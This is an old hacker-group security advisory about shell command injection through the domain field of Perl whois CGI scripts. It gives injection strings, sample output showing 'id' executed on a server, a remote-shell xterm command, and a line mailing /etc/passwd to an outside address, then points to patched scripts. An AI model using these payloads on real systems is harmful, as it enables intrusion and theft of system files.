~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit!:
These versions allow execution of commands
due to lack of shell escape character
parsing if the domain entries consist of
one of the following strings...
Note: (Strings will vary for different
vulnerable versions.)
1.) ;commands
2.) ";commands
3.) ;commands;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Example!:
If the domain entries consist of:
1.) ;id
2.) ";id
or either,
3.) ;id;
you will see something like this:
'Whois Server Version 1.1
Domain names in the .com, .net, and .org
domains can now be registered with many
different competing registrars. Go to
http://www.internic.net for detailed
information. etc. etc. etc....
(scroll to the bottom of the output.)
uid=501(blah) gid=500(blah)'
^^^^^\
` 'id' was executed on the server.
Other example commands can be ran also...
;xterm -display ip:0.0 -rv -e /bin/sh
";uname -a;whoami;w;ls -al
;cat /etc/passwd|mail you@yourdomain.com;
Etc, Etc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Foo!:
Alot of main *NIC* servers were found
running vulnerable versions. I am in the
process of contacting the main servers,
and the software programmers to advise the
vulnerability.
Very well known/used sites are
vulnerable (Which will rename nameless for
security reasons). I tried to get in
contact with them, but being such a big
company/service, I failed, so sad indeed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fix?:
If you run one of these bad scripts,
delete it and point your browser to:
http://cgi.resourceindex.com/Programs_and_ Scripts/Perl/Internet_Utilities/Whois/
and download one of the secure packages.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shouts to all of hhp.
Fuck you to gH for trying to rip this ADV
before I could release it.
---hhp-2t0--------------------------------
